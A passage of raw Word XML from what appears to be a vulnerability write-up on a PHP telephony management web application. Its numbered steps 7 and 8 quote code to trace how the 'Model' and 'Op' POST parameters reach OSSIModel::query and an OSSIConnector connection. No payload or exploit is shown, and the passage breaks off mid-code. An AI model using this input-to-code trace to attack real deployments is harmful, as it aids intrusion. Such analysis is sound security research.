      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A145D6">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="003804C5">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="002B26FF">
        <w:t xml:space="preserve">The “query” method is called on this class. </w:t>
      </w:r>
      <w:r w:rsidR="003804C5">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003804C5">
        <w:t>particular class</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003804C5">
        <w:t xml:space="preserve"> that is called is </w:t>
      </w:r>
      <w:r w:rsidR="00831184">
        <w:t>ultimately derived from the “Model” POST parameter</w:t>
      </w:r>
      <w:r w:rsidR="002B26FF">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="003804C5">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003804C5">
        <w:t>AARAnalysis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003804C5">
        <w:t xml:space="preserve">” in </w:t>
      </w:r>
      <w:r w:rsidR="0006413C">
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidR="003804C5">
        <w:t xml:space="preserve"> case)</w:t>
      </w:r>
      <w:r w:rsidR="002B26FF">
        <w:t>, and is not particularly important as long as the “Op”</w:t>
      </w:r>
      <w:r w:rsidR="60E6E315">
        <w:t xml:space="preserve"> value</w:t>
      </w:r>
      <w:r w:rsidR="002B26FF">
        <w:t xml:space="preserve"> is one of the operations listed in </w:t>
      </w:r>
      <w:r w:rsidR="3CA64B6C">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="002B26FF">
        <w:t>case statement below (and not “display”):</w:t>
      </w:r>
      <w:r w:rsidR="003804C5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A145D6" w14:paraId="4DC19C55" w14:textId="77777777" w:rsidTr="00A145D6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4DCC650E" w14:textId="77777777" w:rsidR="00A145D6" w:rsidRDefault="00A145D6" w:rsidP="00A145D6">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">public function </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>submitRequest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>( $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>sumbitType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10B2AF2A" w14:textId="77777777" w:rsidR="00A145D6" w:rsidRDefault="00A145D6" w:rsidP="00A145D6">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25A819D9" w14:textId="77777777" w:rsidR="00A145D6" w:rsidRDefault="00A145D6" w:rsidP="00A145D6">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A479CC4" w14:textId="5C1C4545" w:rsidR="00A145D6" w:rsidRDefault="00A145D6" w:rsidP="00A145D6">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r w:rsidRPr="00A145D6">
              <w:t>$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A145D6">
              <w:t>theModel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A145D6">
              <w:t xml:space="preserve"> =&amp; new $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A145D6">
              <w:t>modelClass</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A145D6">
              <w:t>( $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A145D6">
              <w:t>toperation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A145D6">
              <w:t xml:space="preserve"> == 'status' ? null : $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A145D6">
              <w:t>toperation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A145D6">
              <w:t xml:space="preserve"> == 'list' );</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>…</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>switch ( $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>toperation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7855BBFA" w14:textId="77777777" w:rsidR="00A145D6" w:rsidRDefault="00A145D6" w:rsidP="00A145D6">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C196F8B" w14:textId="77777777" w:rsidR="00A145D6" w:rsidRDefault="00A145D6" w:rsidP="00A145D6">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>case 'status':  // a bit of a hack, for now...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46D8D594" w14:textId="77777777" w:rsidR="00A145D6" w:rsidRDefault="00A145D6" w:rsidP="00A145D6">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>case 'display':</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07865D72" w14:textId="77777777" w:rsidR="00A145D6" w:rsidRDefault="00A145D6" w:rsidP="00A145D6">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>case 'list':</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48BB8740" w14:textId="77777777" w:rsidR="00A145D6" w:rsidRDefault="00A145D6" w:rsidP="00A145D6">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>case '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>busyout</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>':</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D407BDD" w14:textId="77777777" w:rsidR="00A145D6" w:rsidRDefault="00A145D6" w:rsidP="00A145D6">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>case 'release':</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DDCB06B" w14:textId="77777777" w:rsidR="00A145D6" w:rsidRDefault="00A145D6" w:rsidP="00A145D6">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>...</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="6668B842" w14:textId="77777777" w:rsidR="00A145D6" w:rsidRDefault="00A145D6" w:rsidP="00A145D6">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">if </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>( $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>toperation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> == 'display' )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A71AF71" w14:textId="77777777" w:rsidR="00A145D6" w:rsidRDefault="00A145D6" w:rsidP="00A145D6">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">  $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bOk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>theModel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-&gt;</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>retrieve( $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>tqualifier</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>fieldArray</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>opName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> );</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5664585E" w14:textId="77777777" w:rsidR="00A145D6" w:rsidRDefault="00A145D6" w:rsidP="00A145D6">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>else</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FFED189" w14:textId="77777777" w:rsidR="00A145D6" w:rsidRDefault="00A145D6" w:rsidP="00A145D6">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00A145D6">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A145D6">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>bOk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A145D6">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve"> = $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A145D6">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>theModel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A145D6">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>-&gt;</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A145D6">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>query( $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A145D6">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>tqualifier</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A145D6">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>, $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A145D6">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>fieldArray</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A145D6">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>, $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A145D6">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>opName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A145D6">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve"> );</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F88CA31" w14:textId="02DC509C" w:rsidR="00A145D6" w:rsidRDefault="00A145D6" w:rsidP="00A145D6">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>…</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E68ED77" w14:textId="77777777" w:rsidR="002B26FF" w:rsidRDefault="002B26FF" w:rsidP="008E2160"/>
    <w:p w14:paraId="53FF3196" w14:textId="5F7CF2BC" w:rsidR="00831184" w:rsidRDefault="00831184">
      <w:r>
        <w:t xml:space="preserve">7) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00831184">
        <w:t>AARAnalysisModel.class.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00831184">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B26FF">
        <w:t xml:space="preserve">(and all other models) </w:t>
      </w:r>
      <w:r>
        <w:t>extends “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OSSIModel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” (/opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mvap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/web/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/include/</w:t>
      </w:r>
      <w:r w:rsidRPr="00831184">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OSSIModel.class.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OSSIModel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is ultimately what gets called when the “query” method is called in the previous step. This in turn calls “$this-&gt;_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>openConnection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)”:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00831184" w14:paraId="4DFBE774" w14:textId="77777777" w:rsidTr="00831184">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="412D91A8" w14:textId="77777777" w:rsidR="00831184" w:rsidRDefault="00831184" w:rsidP="00831184">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">function </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>query( $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>aParams</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = null, $fields=null, $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cmdName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>='list' )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C39A1E4" w14:textId="00494CFA" w:rsidR="00831184" w:rsidRDefault="00831184" w:rsidP="00831184">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FC0C07F" w14:textId="17B35E70" w:rsidR="00831184" w:rsidRDefault="00831184" w:rsidP="00831184">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">     …</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00A5A6DA" w14:textId="77777777" w:rsidR="00831184" w:rsidRDefault="00831184" w:rsidP="00831184">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">     if </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>( !</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00831184">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>$this-&gt;_</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00831184">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>openConnection</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00831184">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00831184">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DFE9D15" w14:textId="77777777" w:rsidR="00831184" w:rsidRDefault="00831184" w:rsidP="00831184">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">     {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DB0AD7A" w14:textId="5EC28B2C" w:rsidR="00831184" w:rsidRDefault="00831184" w:rsidP="00831184">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>…</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13549E51" w14:textId="77777777" w:rsidR="00831184" w:rsidRDefault="00831184"/>
    <w:p w14:paraId="79B9F367" w14:textId="245A4A61" w:rsidR="00E304A0" w:rsidRDefault="00831184">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">8) </w:t>
      </w:r>
      <w:r w:rsidR="00E304A0">
        <w:t>“_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E304A0">
        <w:t>openConnection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E304A0">
        <w:t>” instantiates the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E304A0">
        <w:t>OSSIConnector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E304A0">
        <w:t>” class (</w:t>
      </w:r>
      <w:r w:rsidR="00E304A0" w:rsidRPr="00E304A0">
        <w:t>/opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E304A0" w:rsidRPr="00E304A0">
        <w:t>mvap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E304A0" w:rsidRPr="00E304A0">
        <w:t>/web/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E304A0" w:rsidRPr="00E304A0">
        <w:t>sms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E304A0" w:rsidRPr="00E304A0">
        <w:t>/include/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E304A0" w:rsidRPr="00E304A0">
        <w:t>OSSIConnector.class.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E304A0">
        <w:t>) and then ultimately calls the “Connect” method:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E304A0" w14:paraId="5F814D09" w14:textId="77777777" w:rsidTr="00E304A0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0FD30BD9" w14:textId="77777777" w:rsidR="00E304A0" w:rsidRDefault="00E304A0" w:rsidP="00E304A0">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>function _</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>openConnection</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>( $</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>writable=false )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E7A41A6" w14:textId="0B7CC4B5" w:rsidR="00E304A0" w:rsidRDefault="00E304A0" w:rsidP="00E304A0">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23355187" w14:textId="77777777" w:rsidR="00E304A0" w:rsidRDefault="00E304A0" w:rsidP="00E304A0">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    // often, e.g., when paging through multi-page wizards, the connection may not be required on every</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F8561D0" w14:textId="77777777" w:rsidR="00E304A0" w:rsidRDefault="00E304A0" w:rsidP="00E304A0">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    // page where the model is used!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B064420" w14:textId="77777777" w:rsidR="00E304A0" w:rsidRDefault="00E304A0" w:rsidP="00E304A0">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    // only take the hit for it when </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>actually about</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> to use it.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A70581D" w14:textId="77777777" w:rsidR="00E304A0" w:rsidRDefault="00E304A0" w:rsidP="00E304A0">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    static $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bConnectionOpen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>false;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="52F13E3B" w14:textId="77777777" w:rsidR="00E304A0" w:rsidRDefault="00E304A0" w:rsidP="00E304A0">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00E304A0">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E304A0">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>db</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E304A0">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve"> =&amp; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E304A0">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>ConnectionFactory</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E304A0">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>::</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E304A0">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>getConnector</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E304A0">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BED3447" w14:textId="77777777" w:rsidR="00E304A0" w:rsidRDefault="00E304A0" w:rsidP="00E304A0">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    //</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Message::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>Trace( "Requesting %s data connection", $writable ? "read-write</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>" :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> "read-only" );</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25FB4F47" w14:textId="77777777" w:rsidR="00E304A0" w:rsidRDefault="00E304A0" w:rsidP="00E304A0">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    if </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>( !</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bConnectionOpen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> )</w:t>
